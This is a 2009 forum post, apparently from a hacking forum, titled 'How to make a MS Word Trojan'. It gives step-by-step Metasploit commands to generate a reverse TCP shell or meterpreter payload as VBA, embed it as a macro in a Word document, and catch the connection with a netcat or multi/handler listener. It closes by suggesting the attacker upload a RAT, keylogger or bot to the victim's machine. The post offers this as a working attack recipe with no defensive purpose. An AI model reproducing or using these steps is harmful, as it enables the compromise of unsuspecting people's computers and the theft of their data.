How to make a MS Word Trojan

How to make a MS Word Trojan

08-29-2009, 10:28 PM (This post was last modified: 08-30-2009 12:15 AM by silverbandit91.) Post: #1

silverbandit91  Root Administrator Posts: 2,324 Joined: Jul 2009 Reputation: 16

Ok well unless i'm terrible at using the search button, I don't think anyone else has posted this. Anyway this is how you can use metasploit to make a vbs reverse meterpreter payload and import it into a Microsoft Word as a macro. It's super easy. download and install metasploit Code: http://www.metasploit.com/ Ok first we create the payload with msfpayload Windows: Start>All Programs>Metasploit 3>CMD Shell Code: ruby msfpayload windows/shell_reverse_tcp LHOST=your_ip LPORT=4444 V > C:\evil.bas Linux: Code: ./msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 V > evil.bas Open up an new word document in word 2003. Go tools>macro>Visual Basic editor File>Import File now select your evil.bas file. File>Save Normal File>Close and Return to Microsoft Word Save it. Windows: Download netcat. open up cmd Code: nc.exe -l -p 4444 -v Linux: set up a listener with metasploit Code: msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4444 set LHOST your_ip exploit Then open the word document on another pc and you will get a meterpreter session. You can now use meterpreter's upload and execute commands to upload and run your perfered rat/keylogger/bot on the target machine.